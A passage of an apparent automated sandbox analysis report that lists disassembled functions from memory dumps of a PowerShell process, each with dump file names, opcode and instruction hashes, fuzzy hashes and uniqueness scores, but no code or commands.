                                  Download Yara Rule
                                  APIs
                                  • SetThreadUILanguage.KERNELBASE ref: 082CC9A2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1766246868.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_82c0000_powershell.jbxd
                                  Similarity
                                  • API ID: LanguageThread
                                  • String ID:
                                  • API String ID: 243849632-0
                                  • Opcode ID: 482dc87de0a9d86807a6b9df9343d9cc4720f5f3dc00b57b4a4b1649a9d75503
                                  • Instruction ID: 99140ce82d809aa821a520694a3c58b106696487728743440a431c74ad4efd59
                                  • Opcode Fuzzy Hash: 482dc87de0a9d86807a6b9df9343d9cc4720f5f3dc00b57b4a4b1649a9d75503
                                  • Instruction Fuzzy Hash: B41122B0814689CFCB50DF9AD588BEEFBF8EB48324F14855ED519A3610C778A940CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D38C38 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: s)
                                  • API String ID: 0-2727421637
                                  • Opcode ID: ebb103b1344e86edf3d079e3a1ac7bd715b8bdb4eb636d0dcb3a171a1a994328
                                  • Instruction ID: 99c310ee1445e1804453e6fbcdb55dceaa3486e1cd40ae2dea84a78cb8b141fa
                                  • Opcode Fuzzy Hash: ebb103b1344e86edf3d079e3a1ac7bd715b8bdb4eb636d0dcb3a171a1a994328
                                  • Instruction Fuzzy Hash: B1919CB0A046459FCB18DF68C490A9EF7B2FF84308F148968E455AF755CB75EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D38C37 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: s)
                                  • API String ID: 0-2727421637
                                  • Opcode ID: 343e9fcafa4d981ba066ab601362c7c901c343803684a416922c69f0f297edd1
                                  • Instruction ID: 2c640506c337be5fde671f2d619ac01b1d102a4c61302f189411ec87d3187b1a
                                  • Opcode Fuzzy Hash: 343e9fcafa4d981ba066ab601362c7c901c343803684a416922c69f0f297edd1
                                  • Instruction Fuzzy Hash: 3B917BB0A046459FCB18DF68C490A9EF7B2FF88308F548968E455AF755CB71EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D39ECC Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LR}l
                                  • API String ID: 0-1093396623
                                  • Opcode ID: d11d73525fbfb9182ea85ab5ec79b081b287e6d1f04b08200720d21cafa22132
                                  • Instruction ID: 002bf7ce382eb8ba96e90c790b56bcb69ae27289381aaa34eed2cfa5e1dea096
                                  • Opcode Fuzzy Hash: d11d73525fbfb9182ea85ab5ec79b081b287e6d1f04b08200720d21cafa22132
                                  • Instruction Fuzzy Hash: 10512C70A01205CFDB14DF74D555BADB7B1FF88345F148429E442AB3A1CB75AC85CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D360F8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k
                                  • API String ID: 0-1881157740
                                  • Opcode ID: 7324a457033c52d71612ed5e7c1dca0e2b30695b350bc0457745cc3098e184d5
                                  • Instruction ID: 3f49bc2c07a8d9a9b7f8eddc325112fb4b051c3a18b2a02ec1429e0b1c4197e0
                                  • Opcode Fuzzy Hash: 7324a457033c52d71612ed5e7c1dca0e2b30695b350bc0457745cc3098e184d5
                                  • Instruction Fuzzy Hash: BEF0271170A3902FEB48B2B418625FE26ABCFC71D4B058477E642DF385EE288C0103E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D36108 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k
                                  • API String ID: 0-1881157740
                                  • Opcode ID: a85dd4312ed1ca2f499fb52c2dc59800e9b6efbd88bb159e1b52596bff55902d
                                  • Instruction ID: a1284646f972c4b8ef95a561e20bc0f6510c221fe37a57f9223b38988c83ff1f
                                  • Opcode Fuzzy Hash: a85dd4312ed1ca2f499fb52c2dc59800e9b6efbd88bb159e1b52596bff55902d
                                  • Instruction Fuzzy Hash: 83E06805B553501BEB88B2B9185267F21DB8BC6188F05D839A206EB388EF38DC0103D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB7354 Relevance: .5, Instructions: 537COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b3e0ec29745a6f5e7b3b531a2c0e6d13e52aa30f4138c79fc18f939303d0fba
                                  • Instruction ID: 741ff5e2e140f90215302b107162843c93b555cc5452a2cb2e5d6a92299ee264
                                  • Opcode Fuzzy Hash: 9b3e0ec29745a6f5e7b3b531a2c0e6d13e52aa30f4138c79fc18f939303d0fba
                                  • Instruction Fuzzy Hash: EE322A74A00209DFCB15DFA8D994A9DBBB2FF88301F158469E906AB365DB31ED41CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB9740 Relevance: .5, Instructions: 521COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d78da5907738a20832621592cf7e163a470fa0a08a6fdaf7984fc0db2d1ed50
                                  • Instruction ID: 19988ed220da5aca3dfb4469acab7326d97e32826bbf82cc2a0a9738071f33bc
                                  • Opcode Fuzzy Hash: 9d78da5907738a20832621592cf7e163a470fa0a08a6fdaf7984fc0db2d1ed50
                                  • Instruction Fuzzy Hash: 47224870A00605DFCB65DFA4D484A9EBBB6FF88300F158569E90AAB360DB35ED41CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB8818 Relevance: .4, Instructions: 443COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a7d314867dc2aa47a202653ace383e66c365dc0ad39626a1e507487d307c83c
                                  • Instruction ID: 26f26cff860f90bc6023c9d6b16e88c80cb45b49a9c6dd36b2573ed90576f32f
                                  • Opcode Fuzzy Hash: 8a7d314867dc2aa47a202653ace383e66c365dc0ad39626a1e507487d307c83c
                                  • Instruction Fuzzy Hash: 51F149B4A14205CFCB14DFB4D894AAEB7FAFF88301F158469E905AB390DB359D41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB5D09 Relevance: .4, Instructions: 408COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 478c7454613b2593535d11596f36b42673903287db7ef4aa52db0b0f5b704e26
                                  • Instruction ID: 1ea5ab68410aa21c391ece4aa0104c75ce62ebb4541c69485e15372163b1a9db
                                  • Opcode Fuzzy Hash: 478c7454613b2593535d11596f36b42673903287db7ef4aa52db0b0f5b704e26
                                  • Instruction Fuzzy Hash: 75021B74A00218CFCB24DFA4D894A9DB7B6FF89305F248569E50AEB3A1DB35AD41CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3E180 Relevance: .4, Instructions: 403COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 807fb2b038f25f9e5e5e8c4fbf3f5364e6e0273b3d6bdc6255f5af891963776d
                                  • Instruction ID: 818f98add6132c69a3309798cca9473545c8fc53dbda7e7165db03ea9d595f66
                                  • Opcode Fuzzy Hash: 807fb2b038f25f9e5e5e8c4fbf3f5364e6e0273b3d6bdc6255f5af891963776d
                                  • Instruction Fuzzy Hash: E8F15F74B00209ABDB04DFA4D855BBEB7B6FF89301F148428E605AB390CF75AD42DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3C248 Relevance: .4, Instructions: 390COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03fb41b74e8ff09926b55979a21c52140ebda1c1ee7905399a1edd7215707aa1
                                  • Instruction ID: 94b2e42eed2137114a7caba5b3290e58d2fad02bf60d35dfa25acaebadb8e536
                                  • Opcode Fuzzy Hash: 03fb41b74e8ff09926b55979a21c52140ebda1c1ee7905399a1edd7215707aa1
                                  • Instruction Fuzzy Hash: C8E17074B152049FCB04DBB4D8556AEB7B6FBC8301F158069DA0AEB394DF34AD05CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A910 Relevance: .3, Instructions: 280COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37295b610d634e8abcd5a33b8a6e1d51541f2a7e340388553c904feec3785467
                                  • Instruction ID: 51c18453b9f2ecce065136b30efa9821685d301a81d9546cd1908586361ff3bd
                                  • Opcode Fuzzy Hash: 37295b610d634e8abcd5a33b8a6e1d51541f2a7e340388553c904feec3785467
                                  • Instruction Fuzzy Hash: D3C149B4B002498FDB54CFA4C554BAEBBB2BF85301F158468E489AF7A4DB74EC85CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBD040 Relevance: .3, Instructions: 280COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06eb8f2e42213b6c89054afa4ee6d9a11041754c2c799c5201818508c672c75e
                                  • Instruction ID: 99c028ac4e8bcb214d9bdbcd644516dd448ea9dc559ce7b79e3f06aa4f20605f
                                  • Opcode Fuzzy Hash: 06eb8f2e42213b6c89054afa4ee6d9a11041754c2c799c5201818508c672c75e
                                  • Instruction Fuzzy Hash: DDA1AC747042458FCB04DBB9D894AAEBBA6EFC8310F058029F50ADB395DB38DD458B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBBD30 Relevance: .3, Instructions: 277COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 135fc77bf0c3cad936ddc0baba53fb74f073eba78998cb385cec684840893f1b
                                  • Instruction ID: c00b485a48284896043949197feaca2330980697ba8b36b4de2376460e92e4c7
                                  • Opcode Fuzzy Hash: 135fc77bf0c3cad936ddc0baba53fb74f073eba78998cb385cec684840893f1b
                                  • Instruction Fuzzy Hash: 59B147B4A002099FDB24DFA5C584AEEB7F6AF88304F148469F905EB251DB35ED41CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBB398 Relevance: .3, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81e3d25755e1fb5c57069157b5864e3819dcb6948c7a956b01e79b91656eb54b
                                  • Instruction ID: 37c871d66913f7ad9777aa19b212b273b53c9abc6c79334f255afa67e2b2c3ee
                                  • Opcode Fuzzy Hash: 81e3d25755e1fb5c57069157b5864e3819dcb6948c7a956b01e79b91656eb54b
                                  • Instruction Fuzzy Hash: 388125F17083458FCB298FA9D9D41AE7BA5EF82300F15847AF14ACB251DB34CD498B62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBC883 Relevance: .2, Instructions: 245COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cb4e43190fed470f09ba30c787f5ab3ae65a1ef9612b80f07b589306ba4b1c1
                                  • Instruction ID: 372a87eb102627f3d2fc9a89dc641e856f1315066aae5fd1eb0e5caa96c3770d
                                  • Opcode Fuzzy Hash: 3cb4e43190fed470f09ba30c787f5ab3ae65a1ef9612b80f07b589306ba4b1c1
                                  • Instruction Fuzzy Hash: B0919E79B14210CFDB20CB65C888BEE77E6AF89355F198065E902EB3A1DB74DC45CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3C9B0 Relevance: .2, Instructions: 234COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 10691da91e9eba832aebcdb1a663ceece1b8fc28af076d3029787a8dec51dbb4
                                  • Instruction ID: e123458a593a3c50b47aa32183b3cf90a0f15a15946ee69e22d1803db853310e
                                  • Opcode Fuzzy Hash: 10691da91e9eba832aebcdb1a663ceece1b8fc28af076d3029787a8dec51dbb4
                                  • Instruction Fuzzy Hash: 8981B4B5B14214AFCB05DFA4D8156AEBBB6FF88300F044469FA09EB391DB359D05CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBAB7A Relevance: .2, Instructions: 232COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abdfbb1a767fd21d37babc900b462f188804985bc4339eaac5033d940bc7fa6e
                                  • Instruction ID: 8973b911d5ced7a291faf3f547f350dd97391c5929a5356f2cf62ed33068eb21
                                  • Opcode Fuzzy Hash: abdfbb1a767fd21d37babc900b462f188804985bc4339eaac5033d940bc7fa6e
                                  • Instruction Fuzzy Hash: E3A158B4A04258DFDB25DFA4C494BADBBB2FF48301F518069E445AB3A1CB75AD81CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB6244 Relevance: .2, Instructions: 216COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4105bbe91b0e3b832fa3f3461141d2a35be66ca02fb4b11c63b71b5463a2939f
                                  • Instruction ID: af9523e5b8544e7614a73a6d68a3c10ce14dd6897150facfe67cecdd42385d83
                                  • Opcode Fuzzy Hash: 4105bbe91b0e3b832fa3f3461141d2a35be66ca02fb4b11c63b71b5463a2939f
                                  • Instruction Fuzzy Hash: 6E912E74A00214CFDB24DFA4D494AADB7B6FF88305F148069E506EB391DB359D81CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBB690 Relevance: .2, Instructions: 211COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b740bfb75540beebf2a90cb47f853563bd32ea129641684192f17f642d85db4
                                  • Instruction ID: 0f89bb041d4e18903bb62f8104629587b5f36a729c76a4432dc9240f9dcd7b37
                                  • Opcode Fuzzy Hash: 5b740bfb75540beebf2a90cb47f853563bd32ea129641684192f17f642d85db4
                                  • Instruction Fuzzy Hash: 2281B1B1E002098FDB24CFA4C8407DDBBB2EF89314F158559E905BB290DB716E4ACBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3E718 Relevance: .2, Instructions: 209COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5ed5287789840e59a4a5ada346fcc4753d452e54d5d4e360fd3d028d1651960
                                  • Instruction ID: 37e946cee3fa9c3e07a37ecaba98b9de2358b73ed02f04a2b9cf444c555fa74d
                                  • Opcode Fuzzy Hash: d5ed5287789840e59a4a5ada346fcc4753d452e54d5d4e360fd3d028d1651960
                                  • Instruction Fuzzy Hash: 15917D70A002499FCB04DFA4C994B9EBBB2FF89304F148569E905AF3A5CB74AD45CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB782E Relevance: .2, Instructions: 191COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 987375dce1a849d92be4250c53c12b43b0870c0e771478737435a96d23779c7f
                                  • Instruction ID: d73d52ae0ea26de78e8e2f84b4cb1794899c024beb5740a289dd090211507653
                                  • Opcode Fuzzy Hash: 987375dce1a849d92be4250c53c12b43b0870c0e771478737435a96d23779c7f
                                  • Instruction Fuzzy Hash: 96714974A002089FCB15DF68C494AEEB7F2EF89310F158469E916AB365DB34ED41CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B5C2 Relevance: .2, Instructions: 187COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 732ceab400754e74449a59dcfd2a372db5b2bc2922946dbffe6e10dd062668a2
                                  • Instruction ID: c726d04ebff3a7c12e4e5e16e82731c2d7dd652803f941269e8bf0ca6de079ed
                                  • Opcode Fuzzy Hash: 732ceab400754e74449a59dcfd2a372db5b2bc2922946dbffe6e10dd062668a2
                                  • Instruction Fuzzy Hash: 9E61AFB5E042499FCB08DFA9D4815DEBBF6FF88300F14842AE901EB355DB70AD058B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D363D8 Relevance: .2, Instructions: 178COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 038efa49a8110cc502b0872287a355a6b33f623d1bc3020e301576983b073cc8
                                  • Instruction ID: 3e2532eeab2bd00907796358b18e4f7e10bbd1869470a92b1c39cad9d8d6d47a
                                  • Opcode Fuzzy Hash: 038efa49a8110cc502b0872287a355a6b33f623d1bc3020e301576983b073cc8
                                  • Instruction Fuzzy Hash: 6C51B1B4B14156ABDB049F78985467FB6FBEB88641B114539EA03E7398EF30CC018BE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB6CD8 Relevance: .2, Instructions: 178COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d12fce999eb1c56fa44c7e94b2366d88fc396af67baf64d609d244ca9cfdcad4
                                  • Instruction ID: c32a4de9ff6fb0a926cbf4b0baba03f608e46449978b9a8977d03493f54dad7f
                                  • Opcode Fuzzy Hash: d12fce999eb1c56fa44c7e94b2366d88fc396af67baf64d609d244ca9cfdcad4
                                  • Instruction Fuzzy Hash: 56711B70A002599FCB14DFA4D998AEE7BB6FF88311F148428E906BB390DB359D41CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C69998 Relevance: .2, Instructions: 177COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1569be70c327b6097e693f96562e7e12a7e1080248d50bd3ae3dbddbbcbb187
                                  • Instruction ID: 594c519e8665d01cb6fad374d5f3547235a65bc2f7d949dcf832be4cc48c1d50
                                  • Opcode Fuzzy Hash: e1569be70c327b6097e693f96562e7e12a7e1080248d50bd3ae3dbddbbcbb187
                                  • Instruction Fuzzy Hash: 79616DB0A042048FCB15DBB8D4D86ADBBF2FF89310F05886AD805EB391DB75A945CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C67CE0 Relevance: .2, Instructions: 175COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6929b29d6646d51c4ed0dcd0bf7d8213043ac8ee7c2567099f9bf0c0d20ab726
                                  • Instruction ID: 58140c1431508ccd9e4bea4fcb2ae90e9f28e6f3bdce6cde00790d1f15a409fe
                                  • Opcode Fuzzy Hash: 6929b29d6646d51c4ed0dcd0bf7d8213043ac8ee7c2567099f9bf0c0d20ab726
                                  • Instruction Fuzzy Hash: 5E616D74A10219DFCB04DFA8D9C89ADBBF2FF88314F158869E505AB361CB30AD45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB54F0 Relevance: .2, Instructions: 173COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0ee8c245953e2bfe0e2014a18ca776ddf442f195a94504f7f2c4019abba04de
                                  • Instruction ID: 534f902328129f18b775ae6ec0e13c9f19a420422b361232f54d43cc90f8ecaa
                                  • Opcode Fuzzy Hash: f0ee8c245953e2bfe0e2014a18ca776ddf442f195a94504f7f2c4019abba04de
                                  • Instruction Fuzzy Hash: 0D613D70A00259CFDB24DFA5D99469EB7B2FF88305F148428E406AB394DB75AD46CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB54DE Relevance: .2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a12e0a35326c5194cda1b6c9385de1bd929333740be41f48afcd9baa2e5f5bb0
                                  • Instruction ID: 7598596a3d78675e2356f5aea8be462c86d07aa38e3a2c7c2eab92576c89dc94
                                  • Opcode Fuzzy Hash: a12e0a35326c5194cda1b6c9385de1bd929333740be41f48afcd9baa2e5f5bb0
                                  • Instruction Fuzzy Hash: A5615E74A002598FDB24DFA4D99469EB7B2FF88305F148428E406AF794DB71ED46CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3D68A Relevance: .2, Instructions: 163COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67b950f917e63a640ff82c8fb6d619454bea202a60e37c9d9c70b2d64ab9ff65
                                  • Instruction ID: 76c0f10fbcf37cc9a72a300d3c23bd71041ff670f2ac1542fce96da8380dbb14
                                  • Opcode Fuzzy Hash: 67b950f917e63a640ff82c8fb6d619454bea202a60e37c9d9c70b2d64ab9ff65
                                  • Instruction Fuzzy Hash: 2451BDB0E0465A9BDB14CFA4C8507EEBBF2EF84304F144429E845BB384DB74A945CFA1
